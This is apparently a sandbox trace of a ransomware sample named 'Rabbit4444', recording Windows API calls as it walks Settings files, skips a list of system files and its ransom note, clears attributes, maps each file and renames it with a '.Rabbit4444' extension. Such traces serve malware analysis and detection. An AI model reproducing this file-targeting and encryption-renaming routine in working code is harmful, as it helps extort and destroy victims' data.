lstrcmpiW (lpString1="AAA_SettingsPageMaps.settingcontent-ms", lpString2="boot") returned -1 [0056.603] lstrcmpiW (lpString1="AAA_SettingsPageMaps.settingcontent-ms", lpString2="ids.txt") returned -1 [0056.603] lstrcmpiW (lpString1="AAA_SettingsPageMaps.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0056.603] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SettingsPageMaps.settingcontent-ms" | out: lpString1="AAA_SettingsPageMaps.settingcontent-ms") returned="AAA_SettingsPageMaps.settingcontent-ms" [0056.603] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageMaps.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0056.603] lstrlenW (lpString="AAA_SettingsPageMaps.settingcontent-ms") returned 38 [0056.603] lstrlenW (lpString="Rabbit4444") returned 10 [0056.603] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0056.603] lstrlenW (lpString=".dll") returned 4 [0056.603] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0056.603] lstrlenW (lpString=".lnk") returned 4 [0056.603] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0056.603] lstrlenW (lpString=".ini") returned 4 [0056.603] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0056.603] lstrlenW (lpString=".sys") returned 4 [0056.603] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0056.604] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageMaps.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspagemaps.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0056.604] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0056.604] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14791452330) returned 1 [0056.604] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1027) returned 1 [0056.604] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1176f8 [0056.604] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1018d0 [0056.604] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x710, lpName=0x0) returned 0x298 [0056.605] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x710) returned 0x70000 [0056.606] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0056.606] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0056.606] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.606] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0056.606] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0056.606] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0056.606] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.606] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0056.606] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14791699241) returned 1 [0056.606] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1176f8 | out: hHeap=0xe0000) returned 1 [0056.606] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1018d0 | out: hHeap=0xe0000) returned 1 [0056.606] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.606] CloseHandle (hObject=0x298) returned 1 [0056.606] CloseHandle (hObject=0x278) returned 1 [0056.607] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageMaps.settingcontent-ms.Rabbit4444") returned 166 [0056.607] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageMaps.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspagemaps.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageMaps.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspagemaps.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0056.607] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2df6a01, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x2df6a01, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x2340c766, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x42b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SettingsPageMultiTasking.settingcontent-ms", cAlternateFileName="AA9989~1.SET")) returned 1 [0056.607] lstrcmpiW (lpString1="AAA_SettingsPageMultiTasking.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.607] lstrcmpiW (lpString1="AAA_SettingsPageMultiTasking.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.607] lstrcmpiW (lpString1="AAA_SettingsPageMultiTasking.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0056.607] lstrcmpiW (lpString1="AAA_SettingsPageMultiTasking.settingcontent-ms", lpString2=".") returned 1 [0056.607] lstrcmpiW (lpString1="AAA_SettingsPageMultiTasking.settingcontent-ms", lpString2="..") returned 1 [0056.607] lstrcmpiW (lpString1="AAA_SettingsPageMultiTasking.settingcontent-ms", lpString2="windows") returned -1 [0056.607] lstrcmpiW (lpString1="AAA_SettingsPageMultiTasking.settingcontent-ms", lpString2="bootmgr") returned -1 [0056.607] lstrcmpiW (lpString1="AAA_SettingsPageMultiTasking.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0056.607] lstrcmpiW (lpString1="AAA_SettingsPageMultiTasking.settingcontent-ms", lpString2="boot") returned -1 [0056.607] lstrcmpiW (lpString1="AAA_SettingsPageMultiTasking.settingcontent-ms", lpString2="ids.txt") returned -1 [0056.607] lstrcmpiW (lpString1="AAA_SettingsPageMultiTasking.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0056.608] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SettingsPageMultiTasking.settingcontent-ms" | out: lpString1="AAA_SettingsPageMultiTasking.settingcontent-ms") returned="AAA_SettingsPageMultiTasking.settingcontent-ms" [0056.608] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageMultiTasking.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0056.612] lstrlenW (lpString="AAA_SettingsPageMultiTasking.settingcontent-ms") returned 46 [0056.612] lstrlenW (lpString="Rabbit4444") returned 10 [0056.612] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0056.612] lstrlenW (lpString=".dll") returned 4 [0056.612] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0056.612] lstrlenW (lpString=".lnk") returned 4 [0056.612] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0056.612] lstrlenW (lpString=".ini") returned 4 [0056.612] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0056.612] lstrlenW (lpString=".sys") returned 4 [0056.612] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0056.612] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageMultiTasking.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspagemultitasking.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0056.612] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0056.612] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14792293541) returned 1 [0056.612] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1067) returned 1 [0056.612] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1176f8 [0056.612] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101af0 [0056.612] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x730, lpName=0x0) returned 0x298 [0056.615] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x730) returned 0x70000 [0056.616] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0056.616] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0056.616] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.616] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0056.616] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0056.616] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0056.616] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.616] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0056.616] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14792687579) returned 1 [0056.616] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1176f8 | out: hHeap=0xe0000) returned 1 [0056.616] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101af0 | out: hHeap=0xe0000) returned 1 [0056.616] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.616] CloseHandle (hObject=0x298) returned 1 [0056.616] CloseHandle (hObject=0x278) returned 1 [0056.616] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageMultiTasking.settingcontent-ms.Rabbit4444") returned 174 [0056.616] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageMultiTasking.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspagemultitasking.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageMultiTasking.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspagemultitasking.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0056.617] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x46409e3, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x46409e3, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x239b6099, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x44e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SettingsPageNetworkAirplaneMode.settingcontent-ms", cAlternateFileName="AA619A~1.SET")) returned 1 [0056.617] lstrcmpiW (lpString1="AAA_SettingsPageNetworkAirplaneMode.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.617] lstrcmpiW (lpString1="AAA_SettingsPageNetworkAirplaneMode.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.617] lstrcmpiW (lpString1="AAA_SettingsPageNetworkAirplaneMode.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0056.617] lstrcmpiW (lpString1="AAA_SettingsPageNetworkAirplaneMode.settingcontent-ms", lpString2=".") returned 1 [0056.617] lstrcmpiW (lpString1="AAA_SettingsPageNetworkAirplaneMode.settingcontent-ms", lpString2="..") returned 1 [0056.617] lstrcmpiW (lpString1="AAA_SettingsPageNetworkAirplaneMode.settingcontent-ms", lpString2="windows") returned -1 [0056.617] lstrcmpiW (lpString1="AAA_SettingsPageNetworkAirplaneMode.settingcontent-ms", lpString2="bootmgr") returned -1 [0056.617] lstrcmpiW (lpString1="AAA_SettingsPageNetworkAirplaneMode.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0056.617] lstrcmpiW (lpString1="AAA_SettingsPageNetworkAirplaneMode.settingcontent-ms", lpString2="boot") returned -1 [0056.617] lstrcmpiW (lpString1="AAA_SettingsPageNetworkAirplaneMode.settingcontent-ms", lpString2="ids.txt") returned -1 [0056.617] lstrcmpiW (lpString1="AAA_SettingsPageNetworkAirplaneMode.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0056.617] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SettingsPageNetworkAirplaneMode.settingcontent-ms" | out: lpString1="AAA_SettingsPageNetworkAirplaneMode.settingcontent-ms") returned="AAA_SettingsPageNetworkAirplaneMode.settingcontent-ms" [0056.618] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageNetworkAirplaneMode.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0056.618] lstrlenW (lpString="AAA_SettingsPageNetworkAirplaneMode.settingcontent-ms") returned 53 [0056.618] lstrlenW (lpString="Rabbit4444") returned 10 [0056.618] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0056.618] lstrlenW (lpString=".dll") returned 4 [0056.618] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0056.618] lstrlenW (lpString=".lnk") returned 4 [0056.618] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0056.618] lstrlenW (lpString=".ini") returned 4 [0056.618] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0056.618] lstrlenW (lpString=".sys") returned 4 [0056.618] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0056.618] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageNetworkAirplaneMode.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspagenetworkairplanemode.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0056.618] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0056.618] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14792911951) returned 1 [0056.618] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1102) returned 1 [0056.618] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ba8 [0056.619] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1021d8 [0056.619] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x750, lpName=0x0) returned 0x298 [0056.620] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x750) returned 0x70000 [0056.620] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0056.620] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0056.620] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.620] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0056.620] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0056.621] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0056.621] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.621] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0056.621] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14793155089) returned 1 [0056.621] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ba8 | out: hHeap=0xe0000) returned 1 [0056.621] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1021d8 | out: hHeap=0xe0000) returned 1 [0056.621] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.621] CloseHandle (hObject=0x298) returned 1 [0056.621] CloseHandle (hObject=0x278) returned 1 [0056.621] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageNetworkAirplaneMode.settingcontent-ms.Rabbit4444") returned 181 [0056.621] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageNetworkAirplaneMode.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspagenetworkairplanemode.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageNetworkAirplaneMode.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspagenetworkairplanemode.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0056.622] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e266a5, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x4e266a5, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x233e650b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x430, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SettingsPageNetworkDialup.settingcontent-ms", cAlternateFileName="AA0465~1.SET")) returned 1 [0056.622] lstrcmpiW (lpString1="AAA_SettingsPageNetworkDialup.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.622] lstrcmpiW (lpString1="AAA_SettingsPageNetworkDialup.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.622] lstrcmpiW (lpString1="AAA_SettingsPageNetworkDialup.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0056.622] lstrcmpiW (lpString1="AAA_SettingsPageNetworkDialup.settingcontent-ms", lpString2=".") returned 1 [0056.622] lstrcmpiW (lpString1="AAA_SettingsPageNetworkDialup.settingcontent-ms", lpString2="..") returned 1 [0056.622] lstrcmpiW (lpString1="AAA_SettingsPageNetworkDialup.settingcontent-ms", lpString2="windows") returned -1 [0056.622] lstrcmpiW (lpString1="AAA_SettingsPageNetworkDialup.settingcontent-ms", lpString2="bootmgr") returned -1 [0056.622] lstrcmpiW (lpString1="AAA_SettingsPageNetworkDialup.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0056.622] lstrcmpiW (lpString1="AAA_SettingsPageNetworkDialup.settingcontent-ms", lpString2="boot") returned -1 [0056.622] lstrcmpiW (lpString1="AAA_SettingsPageNetworkDialup.settingcontent-ms", lpString2="ids.txt") returned -1 [0056.622] lstrcmpiW (lpString1="AAA_SettingsPageNetworkDialup.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0056.622] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SettingsPageNetworkDialup.settingcontent-ms" | out: lpString1="AAA_SettingsPageNetworkDialup.settingcontent-ms") returned="AAA_SettingsPageNetworkDialup.settingcontent-ms" [0056.622] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageNetworkDialup.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0056.622] lstrlenW (lpString="AAA_SettingsPageNetworkDialup.settingcontent-ms") returned 47 [0056.622] lstrlenW (lpString="Rabbit4444") returned 10 [0056.622] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0056.623] lstrlenW (lpString=".dll") returned 4 [0056.623] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0056.623] lstrlenW (lpString=".lnk") returned 4 [0056.623] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0056.623] lstrlenW (lpString=".ini") returned 4 [0056.623] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0056.623] lstrlenW (lpString=".sys") returned 4 [0056.623] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0056.623] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageNetworkDialup.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspagenetworkdialup.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0056.623] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0056.623] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14793373481) returned 1 [0056.623] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1072) returned 1 [0056.623] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117860 [0056.623] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101d98 [0056.623] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x730, lpName=0x0) returned 0x298 [0056.624] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x730) returned 0x70000 [0056.625] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0056.625] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0056.625] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.625] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0056.625] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0056.626] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0056.626] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.626] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0056.626] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14793636648) returned 1 [0056.626] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117860 | out: hHeap=0xe0000) returned 1 [0056.626] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101d98 | out: hHeap=0xe0000) returned 1 [0056.626] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.626] CloseHandle (hObject=0x298) returned 1 [0056.626] CloseHandle (hObject=0x278) returned 1 [0056.626] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageNetworkDialup.settingcontent-ms.Rabbit4444") returned 175 [0056.626] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageNetworkDialup.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspagenetworkdialup.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageNetworkDialup.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspagenetworkdialup.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0056.627] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: 